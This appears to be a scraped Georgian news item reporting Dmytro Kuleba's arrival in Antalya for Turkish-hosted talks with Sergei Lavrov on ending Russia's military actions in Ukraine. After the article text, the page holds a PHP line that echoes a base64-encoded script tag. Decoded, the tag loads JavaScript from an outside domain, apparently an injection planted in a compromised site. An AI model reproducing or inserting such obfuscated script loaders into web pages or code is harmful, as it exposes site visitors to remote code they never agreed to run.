celsiusi
ავერსი საქკაბელი
დმიტრო კულება ანტალიაში, მოლაპარაკებებისთვის ჩავიდა, - ამის შესახებ ინფორმაციას უკრაინის საგარეო საქმეთა მინისტრის სპიკერი, ოლეგ ნიკოლენკო ,,ტვიტერის" გვერდზე ავრცელებს.
 
ნიკოლენკოს თქმით, მოლაპარაკებები რუსეთისა და უკრაინის საგარეო საქმეთა მინისტრებს შორის, უკრაინაში, რუსეთის მიერ განხორციელებული საომარი მოქმედებების შეჩერებას შეეხება.
 
,,თურქეთის საგარეო საქმეთა მინისტრის, მევლუთ ჩავუშოღლუს მოწვევით, დმიტრო კულება ანტალიაში, მოლაპარაკებებისთვის ჩავიდა. რუსეთის მიერ, საომარი მოქმედებების შეწყვეტისა და უკრაინის წინააღმდეგ, ომის დასრულების შესახებ", - წერს ნიკოლენკო.
 
შეგახსენებთ, აღნიშნული შეხვედრა სერგეი ლავროვსა და დმიტრო კულებას შორის მოხდება პირველად, მას შემდეგ, რაც რუსეთი შეიჭრა უკრაინაში. შეხვედრის შესახებ დამატებითი დეტალები ამ დროისთვის უცნობია.
821
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");